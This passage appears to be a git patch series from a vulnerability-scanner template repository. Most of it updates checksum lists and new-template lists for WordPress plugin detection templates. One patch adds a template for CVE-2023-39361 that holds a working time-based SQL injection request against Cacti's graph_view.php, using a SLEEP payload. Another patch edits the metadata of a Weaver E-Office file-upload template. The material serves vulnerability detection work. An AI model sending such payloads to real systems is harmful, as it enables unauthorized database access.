+http/technologies/wordpress/plugins/loco-translate.yaml:6e88f4e9ef7197d8de502fd14f47f79b4b46911b +http/technologies/wordpress/plugins/loginizer.yaml:fd0116df11b6730957c17fea8fcc5ce1a7df96c0 +http/technologies/wordpress/plugins/loginpress.yaml:318058c81cfee1d55915a2fbf2ac027d7462b50c +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d96413ced20b451ef657a655f3ba333575a1b2e3 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:d166e9194d9700180585945fa717b01849fb0519 +http/technologies/wordpress/plugins/mailpoet.yaml:28a36b2dbcef7a1e49f30ff165907da3576693b4 +http/technologies/wordpress/plugins/maintenance.yaml:46343810ab17d627079432942446302dca630eeb +http/technologies/wordpress/plugins/mainwp-child.yaml:1a90cfff9eaeab8c397b5269876f7b469cfff7b4 +http/technologies/wordpress/plugins/malcare-security.yaml:20cae47466ca8201c6fbfd58324fe1bc90db9623 +http/technologies/wordpress/plugins/megamenu.yaml:dcdca3e0704e25dcc813c121039640b907274fcd +http/technologies/wordpress/plugins/members.yaml:2e78a795ed43f766f8bfd3bb528fd0ff2f0fddfb +http/technologies/wordpress/plugins/meta-box.yaml:529232e3db137e3bac4eddcee8768ec4c34e7510 +http/technologies/wordpress/plugins/ml-slider.yaml:7c2b57d5255ea5e2cc0ee747502fb24949f46015 +http/technologies/wordpress/plugins/newsletter.yaml:12033cfd493029024d58d9ff46d4d4a8d0a1c3d9 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:21d9b6618fa59927c3833821306bd42ec7c89d29 +http/technologies/wordpress/plugins/nextgen-gallery.yaml:6cabf694d018ce86f802bdac15b8f18c05c373bf +http/technologies/wordpress/plugins/ninja-forms.yaml:346bd7fe3cd6070a50760d1094b93dca734947c8 +http/technologies/wordpress/plugins/ocean-extra.yaml:42bf83b1af5749122b0405343ba20331e27e02f5 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:ff48ca47c1758494b8faf44a9e8d82c0d0545fa4 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:2859e55dd6c58174f198bb2661309cb20b9bc159 +http/technologies/wordpress/plugins/optinmonster.yaml:ad36d7e2024e606ed95427ae8fddbddcbb5be5af +http/technologies/wordpress/plugins/otter-blocks.yaml:a78a532c8c365f7d5389a154c72ffab4a9e198f9 +http/technologies/wordpress/plugins/password-protected.yaml:6878b6ec0edd97837a248d2082b59b73a5c0bd68 +http/technologies/wordpress/plugins/pdf-embedder.yaml:b81ffb6ceaacadea709eba4d896f253a3798ae18 http/technologies/wordpress/plugins/photo-gallery.yaml:a2d49608d9cfa92c7ff2fec2e8d158bbfd1f72dd http/technologies/wordpress/plugins/php-compatibility-checker.yaml:528a6a29383907a8488737d2302a6a1a2d929553 -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:988028ed95ba98427e7659a9ee664c6571e615d5 -http/technologies/wordpress/plugins/pixelyoursite.yaml:f96bdcba1c915994880c8612dc3b10feed1d8d3f -http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83 -http/technologies/wordpress/plugins/popup-builder.yaml:76dbd191f39696f62ac0be9b7e0a7619c300fc9a -http/technologies/wordpress/plugins/popup-maker.yaml:9898f98e8817a0a6eca29a652c9aa671ef897aaa -http/technologies/wordpress/plugins/post-smtp.yaml:fb3913d039e39bdfa909850be96a436c2daed0da -http/technologies/wordpress/plugins/post-types-order.yaml:c140e8206ede576928c853247b1139a9e1306bf2 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4 -http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:c8f30313d72e2d2a6315fc30a8331f2eb9aa41ad -http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175 -http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5 -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864 -http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3abc289406b03c9a1a9a9c3a61f01adca40f3490 -http/technologies/wordpress/plugins/sg-cachepress.yaml:3b166aca8dab47fdce5d13abd98c504b0abfbfcf -http/technologies/wordpress/plugins/sg-security.yaml:1d900366a34bc7240fd070b931b8a69db1fe6291 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:22cf98912edc91bf3425771d400c10f6e39a0e92 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59 +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:c32339accaeaeac78ec9c14a8092e538a37cae47 +http/technologies/wordpress/plugins/pixelyoursite.yaml:b3da054b040050de221d3f85ad1e51d4f109472c +http/technologies/wordpress/plugins/polylang.yaml:fe96dc52452a9589f615f5c50a2a2d566408d24d +http/technologies/wordpress/plugins/popup-builder.yaml:b4c33fcfffe3b96d16f7e7c55a76a57223cfd988 +http/technologies/wordpress/plugins/popup-maker.yaml:e01af93b67f33cd260b458408dc505a8209b629e +http/technologies/wordpress/plugins/post-smtp.yaml:5b34a59d80a1257b18e38bf29177aa83b238f6b2 +http/technologies/wordpress/plugins/post-types-order.yaml:8db67ac7ec324b3d4800afe95f2c5b479fe0af82 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:ac0ee352c996bbeefc1d359b6147caf570f918f4 +http/technologies/wordpress/plugins/pretty-link.yaml:62549cdff64a91d536835fa1fea43109f0561156 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:435b8299f4b4b830f584ef2738d5ec570d709eb4 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:8c3f228a961065c0ffc6ae288e522af0267ad147 +http/technologies/wordpress/plugins/redirection.yaml:d23e77de89ba863def13db88a8b6344d31b0ba19 +http/technologies/wordpress/plugins/redux-framework.yaml:45d721b643a269e7a6837b9a5d1d5fb22e29853b +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:0d6a705e8fcae72c35d8d4b3ed8aa7f79980e8d8 +http/technologies/wordpress/plugins/safe-svg.yaml:a6a21aaef82c40ca2bcb59ce2e61718dd0e6af55 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3e08b5bdb1f3ec58dd08c620b7a9acc728913efd +http/technologies/wordpress/plugins/sg-cachepress.yaml:130f5809e4cf765690b79bcfda7bd132336e4b08 +http/technologies/wordpress/plugins/sg-security.yaml:6bbec86489b5c2eaf257315880bfc0c4fd4d464f +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:2529031f99ea27c92a54d847c15d77480847fdd7 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:d0ef637d9661f51b92339cabe9e3241c8ea9d6c6 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e8069c056b1dcc1dfbbc6ff7a561b9e4c76bc28a http/technologies/wordpress/plugins/simple-page-ordering.yaml:5ca11a9af02a43514837bfae1a4b1e0271674751 -http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81 -http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:243974a21f98da84c266affec329cc4d1f9596da +http/technologies/wordpress/plugins/siteguard.yaml:e4a47780641caa5fc7b28702a8619544f10ad1d2 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:581d45daed9aa4def46869c8dc9770508824abfd +http/technologies/wordpress/plugins/smart-slider-3.yaml:cd1b9cefc186446cdd9209cdd5c456dbcbb42730 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f7e37fa2f502dd7c949c0bf8b43dec56315cc35c http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:c9da76f5a8dab4cb65e35e49aebd0300fe20c1a8 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f -http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6 -http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa -http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2 -http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338 -http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4 -http/technologies/wordpress/plugins/under-construction-page.yaml:006b99ffb995bb30292666cd1d26a6433d95d495 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d3b0d6984b6149fc9c376c67f4427c286a42c4d1 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:de8bfb0cfbd640fc53b8eeeda80fbdf787b66b69 +http/technologies/wordpress/plugins/svg-support.yaml:352c1dd32804e85f4df4b22834ca0e797a2aad60 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:eb076e2a3b271ec1744b1b244cedc859b97b2dcc +http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b +http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928 +http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a +http/technologies/wordpress/plugins/under-construction-page.yaml:d4c9887eca48da58b42bdcad120c493e4b916e35 http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea -http/technologies/wordpress/plugins/updraftplus.yaml:67b8ef043332480e6cc21270e92a83846dfef37f -http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd -http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8 -http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233 -http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521 -http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265 -http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:3c8f70f3717ebb144aeecc4cf78351928e724ee4 -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee -http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba -http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40 +http/technologies/wordpress/plugins/updraftplus.yaml:0076f3c9a5ed4f2e2d2749c1b65eb23140214d7a +http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487 +http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb +http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e +http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97 +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404 +http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4 +http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:9ed780c632c83cd2d948af2a01eee2ea9cdd87a5 +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1 +http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6 +http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d -http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5 -http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074 -http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68 -http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2 -http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a -http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962 -http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded -http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8 -http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:ba98eba18acb3e8959037689a48560a9ce31a9f1 -http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92 +http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee +http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c +http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457 +http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f +http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0 +http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c +http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20 +http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce +http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3 +http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:69b5e88af7e6e7b825f22b6f6eb34dea213dab95 +http/technologies/wordpress/plugins/wp-rollback.yaml:7a2b71c8a6a0c35005dad0fd021f4daa29209549 http/technologies/wordpress/plugins/wp-seopress.yaml:93a821f479301582f2209a9f463b408118cfbec9 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5 -http/technologies/wordpress/plugins/wp-smushit.yaml:dfffaa485180a52888024c527a89ad9c74307aad -http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1 -http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f -http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50 -http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848 -http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b +http/technologies/wordpress/plugins/wp-smushit.yaml:aa13f78eb92d74a227a5cc3b4850c50f9e6d1825 +http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90 +http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624 +http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468 +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671 +http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40 +http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69 @@ -7046,7 +7047,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:53692d2054750574ac6e2dd15a9836497e7fbe17 +templates-checksum.txt:490083e211c0def0939f4b3f905df964d4c50a10 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From a0a5b8645abcd068ad6739347e80c2d83835bf69 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 6 Sep 2023 15:19:36 +0530 Subject: [PATCH 0182/1090] Update weaver-eoffice-file-upload.yaml --- .../weaver/eoffice/weaver-eoffice-file-upload.yaml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/http/vulnerabilities/weaver/eoffice/weaver-eoffice-file-upload.yaml b/http/vulnerabilities/weaver/eoffice/weaver-eoffice-file-upload.yaml index 3671a80a29..2561169ae6 100644 --- a/http/vulnerabilities/weaver/eoffice/weaver-eoffice-file-upload.yaml +++ b/http/vulnerabilities/weaver/eoffice/weaver-eoffice-file-upload.yaml @@ -8,7 +8,11 @@ info: Weaver E-Office version 9.5 is susceptible to an arbitrary file upload vulnerability. This flaw allows malicious actors to upload and execute arbitrary code or files without proper validation or authorization. reference: - https://github.com/RCEraser/cve/blob/main/Weaver.md - tags: e-office,weaver,intrusive,fileupload + metadata: + max-request: 2 + verified: true + fofa-query: app="泛微-EOffice" + tags: e-office,weaver,intrusive,file-upload variables: filename: '{{rand_base(7, "abc")}}' From 58cbb460515c99328040c6f4d9c11d130c37eb32 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 6 Sep 2023 09:53:11 +0000 Subject: [PATCH 0183/1090] Auto Generated New Template Addition List [Wed Sep 6 09:53:11 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 7b3cb779af..0e876f0438 100644 --- a/.new-additions +++ b/.new-additions @@ -39,4 +39,5 @@ http/vulnerabilities/jorani/jorani-benjamin-xss.yaml http/vulnerabilities/other/huatian-oa8000-sqli.yaml http/vulnerabilities/other/landray-oa-datajson-rce.yaml http/vulnerabilities/prestashop/prestashop-apmarketplace-sqli.yaml +http/vulnerabilities/weaver/eoffice/weaver-eoffice-file-upload.yaml workflows/kev-workflow.yaml From e5a232a270fc07bc24edcc5c916dff8516118325 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 6 Sep 2023 09:53:20 +0000 Subject: [PATCH 0184/1090] Auto Generated Templates Checksum [Wed Sep 6 09:53:20 UTC 2023] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 7eb3fa8510..abb4725582 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -6734,6 +6734,7 @@ http/vulnerabilities/weaver/ecology/ecology-mysql-config.yaml:1320d348735dd65472 http/vulnerabilities/weaver/ecology/ecology-springframework-directory-traversal.yaml:b64e0c558600ff0d335b85bbe9b391fed4aed2cd http/vulnerabilities/weaver/ecology/ecology-syncuserinfo-sqli.yaml:d2365b7d9e05b637a00890dc2e6123da13d812f9 http/vulnerabilities/weaver/ecology/ecology-v8-sqli.yaml:883c99908c9e6ba6a9f3c2ff770db9325c581cd9 +http/vulnerabilities/weaver/eoffice/weaver-eoffice-file-upload.yaml:b596abf62e41fc06ca8433f40ba1481c6ca04a46 http/vulnerabilities/weaver/oa-v9-uploads-file.yaml:4f2e2a86334334b312281ca9e804aff5de3f2d47 http/vulnerabilities/webp-server-go/webp-server-go-lfi.yaml:d1f9ee70aae38699a3002ec5e02073fba05af3ea http/vulnerabilities/wordpress/3d-print-lite-xss.yaml:c734362732a3c1589beda39fa1e2fdd1174f104f @@ -7047,7 +7048,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:490083e211c0def0939f4b3f905df964d4c50a10 +templates-checksum.txt:53e9aaf9a6d37d16ff90663d53f2c58919c29f55 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 8939245dee4c0b3b64157cb7e707d492f9b6b5d9 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 6 Sep 2023 17:09:51 +0530 Subject: [PATCH 0185/1090] Create CVE-2023-39361.yaml --- http/cves/2023/CVE-2023-39361.yaml | 33 ++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 http/cves/2023/CVE-2023-39361.yaml diff --git a/http/cves/2023/CVE-2023-39361.yaml b/http/cves/2023/CVE-2023-39361.yaml new file mode 100644 index 0000000000..8199f53e40 --- /dev/null +++ b/http/cves/2023/CVE-2023-39361.yaml @@ -0,0 +1,33 @@ +id: CVE-2023-39361 + +info: + name: Cacti 1.2.24 - SQL Injection + author: ritikchaddha + severity: critical + description: | + Cacti is an open source operational monitoring and fault management framework. Affected versions are subject to a SQL injection discovered in graph_view.php. Since guest users can access graph_view.php without authentication by default, if guest users are being utilized in an enabled state, there could be the potential for significant damage. Attackers may exploit this vulnerability, and there may be possibilities for actions such as the usurpation of administrative privileges or remote code execution. This issue has been addressed in version 1.2.25. Users are advised to upgrade. There are no known workarounds for this vulnerability. + reference: + - https://github.com/Cacti/cacti/security/advisories/GHSA-6r43-q2fw-5wrg + - https://cve.report/CVE-2023-4634 + classification: + cve-id: CVE-2023-39361 + metadata: + max-request: 1 +# verified: true + shodan-query: title:"Login to Cacti" + tags: cve,cve2023,cacti,sqli + +http: + - raw: + - | + @timeout: 20s + GET /graph_view.php?action=tree_content&node=1-1-tree_anchor&rfilter=%22or+%22%22%3D%22%28%28%22%29%29%3BSELECT+SLEEP%2810%29%3B--+- HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'duration>=10' + - 'status_code == 200' +# - 'contains(body, "cactiAction=")' + condition: and From 137cf38b8b83e34a5cdcf3b9b776a59d6f913319 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 6 Sep 2023 17:13:37 +0530 Subject: [PATCH 0186/1090] updated remediation in 2023 CVEs --- http/cves/2023/CVE-2023-0099.yaml | 8 ++++---- http/cves/2023/CVE-2023-0126.yaml | 8 +++++--- http/cves/2023/CVE-2023-0236.yaml | 8 ++++---- http/cves/2023/CVE-2023-0261.yaml | 8 ++++---- http/cves/2023/CVE-2023-0297.yaml | 8 +++++--- http/cves/2023/CVE-2023-0448.yaml | 10 +++++----- http/cves/2023/CVE-2023-0514.yaml | 8 +++++--- http/cves/2023/CVE-2023-0527.yaml | 7 ++++--- http/cves/2023/CVE-2023-0552.yaml | 10 +++++----- http/cves/2023/CVE-2023-0562.yaml | 6 ++++-- http/cves/2023/CVE-2023-0563.yaml | 6 ++++-- http/cves/2023/CVE-2023-0630.yaml | 8 